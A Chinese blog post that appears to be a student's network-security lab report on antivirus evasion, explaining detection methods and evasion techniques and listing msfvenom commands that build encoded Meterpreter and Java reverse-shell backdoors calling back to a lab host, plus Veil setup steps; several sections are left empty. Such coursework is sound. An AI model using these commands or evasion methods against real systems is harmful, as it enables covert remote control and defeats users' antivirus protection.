首页 > 其他分享 > Exp3-免杀原理

Exp3-免杀原理

时间:2023-03-29 16:46:59浏览次数:51  
标签:exe 免杀 Exp3 恶意代码 162.129 192.168 检测 原理

Exp3-免杀原理

实验基础

问题回答

1 杀软是如何检测出恶意代码的?

(1)检测特征码
人有自己的特征,代码也有自己的特征。杀毒软件都有着一套特征库,依靠检索程序代码是否和库中特征码是否吻合来判断某段代码是否属于病毒。
(2)启发式恶意软件检测
如果该程序的特征和行为与病毒程序类似,其匹配程度达到一定值就可以认为该程序是病毒程序。
(3)基于行为检测
与启发式检测类似,只是单纯依靠监测程序行为来作为标准。通过监视恶意代码运行过程,如利用系统监视工具观察恶意代码运行过程时系统环境的变化,或通过跟踪恶意代码执行过程使用的系统函数和指令特征分析恶意代码功能,如出现恶意行为,则属于恶意代码。

2 免杀是做什么?

采取一些手段使我们的病毒程序不被杀毒软件检查出来。可以正常运行以便于我们成功控制靶机。

3 免杀的基本方法有哪些?

  • 改变特征码 :

①加壳:压缩壳 加密壳
②用shellcode(像Meterpreter) ,encode进行编码
③基于payload重新编译生成可执行文件

  • 改变行为 :

①尽量使用反弹式连接,可以避免防火墙的阻拦。
②使用隧道技术,加密通讯数据,作伪装,使杀软无法检测到病毒代码,进而放行。
③尽量基于内存操作,减少对系统的修改,加入混淆作用的正常功能代码。
④使用一个有漏洞的应用当成后门。
⑤纯手工或者半手工打造一个恶意软件。

  • 修改内存特征码
  • 等价替换法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.
  • 通用跳转法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行
  • 非常规方法

4 开启杀软能绝对防止电脑中恶意代码吗?

不能绝对防止。

实验内容

0 实验准备

免杀测试平台:https://www.virustotal.com

kali虚拟机IP地址:192.168.162.129

1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

1.1 kali的IP地址192.168.162.129

1.2 检验直接生成的后门exe文件(实验二中的后门程序)

实验二中生成后门exe文件进行免杀检测

用免杀测试平台测试:https://www.virustotal.com
测试结果如下:

1.3 使用Unicode编码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.162.129 LPORT=1329 -f exe > 20201329backdoor.exe

测试结果:

多次编码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -i -10 -b ‘\x00’ LHOST=192.168.162.129 LPORT=1329 -f exe > 20201329backdoor1.exe

测试结果:

1.4利用php格式文件检测

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.162.129 LPORT=1329 x> 20201329backdoor_php.php


1.5利用jar文件检测

msfvenom -p java/shell_reverse_tcp LHOST=192.168.162.129 LPORT=1329 -f jar > 20201329backdoor_jar.jar

2 veil,加壳工具

2.1安装veil-evasion

输入sudo su进入root用户模式

sudo apt-get update
sudo apt-get install veil-evasion
cd /usr/share/veil/config
vim setup.sh

需要注意的是原安装配置文件setup.sh是从github上下载文件,但是国内访问github的速度比较慢,更改setup.sh第260行的克隆地址为
sudo git clone https://gitee.com/spears/VeilDependencies.git

3 使用C + shellcode编程

4 通过组合应用各种技术实现恶意代码免杀

(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

5 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

问题与解决

实验总结与体会

标签:exe,免杀,Exp3,恶意代码,162.129,192.168,检测,原理
From: https://www.cnblogs.com/weihehahaha/p/17269478.html

相关文章

  • 5.join原理及用法
    join用法及原理Sql查询的基本原理表查询的分类单表查询根据WHERE条件过滤表中的记录,然后根据SELECT指定的列返回查询结果两表连接查询使用ON条件对两表进......
  • 《网络对抗技术》——Exp3 免杀原理与实践
    一、实践内容1.1实践要求1、正确使用msf编码器,使用msfvenom生成如jar之类的其他文件2、veil,加壳工具3、使用C+shellcode编程4、通过组合应用各种技术实现恶意代码......
  • 分布式技术原理与算法解析 04 - 存储&高可靠
    分布式存储分布式数据复制技术常用于数据备份同步复制技术注重一致性,用户请求更新数据库时,主数据库要同步到备数据库后才结束阻塞返回给用户异步复制技术注重可用......
  • synchronized锁升级底层原理
    今天我们来聊聊Synchronized里面的各种锁:偏向锁、轻量级锁、重量级锁,以及三个锁之间是如何进行锁膨胀的。先来一张图来总结提前了解知识锁的升级过程锁的状态总共有四种:无......
  • 脏牛漏洞原理
    漏洞概述dirtycow漏洞是一种发生在写时复制的竞态条件产生的漏洞写时复制(copyonwrite)允许不同进程中的虚拟内存映射到相同物理内存页面的技术三个重要流程A:制作......
  • DolphinDB StreamEngineParser 解析原理介绍
    DolphinDB曾发布过 DolphinDB:WorldQuant101Alpha因子的流批一体实现 和 DolphinDB:国泰君安191Alpha因子的流批一体实现 这两篇文章,介绍了如何基于DolphinDB的......
  • 河北稳控科技便携式钻孔测斜仪的组成与测量原理
    河北稳控科技便携式钻孔测斜仪的组成与测量原理 便携式钻孔测斜仪由测斜探头、多功能数据采集仪组成。测斜探头组成:探头包括吊环、传感段、导向段、加长段、尾段五部分......
  • 20201331 黄文刚 Exp3-免杀原理
    20201331黄文刚Exp3-免杀原理基础问题回答(1)杀软是如何检测出恶意代码的?目前杀毒软件的原理主要有3种:引擎与病毒库的交互作用,通过特征码提取与病毒库中的特征码进行......
  • zabbix原理与搭建
    zabbix的含义:curl-o/etc/yum.repos.d/CentOS-Base.repohttp://mirrors.aliyun.com/repo/Centos-7.repoyummakecachewgethttp://repo.zabbix.com/zabbix/4.0/rhel/7/x......
  • PXE 原理和概念
    原文地址:https://blog.csdn.net/weixin_44841019/article/details/124306378目录一、PXE概述1、PXE2、PXE优点3、使用PXE的前提条件二、KickStart概述三、PXE服务的构建......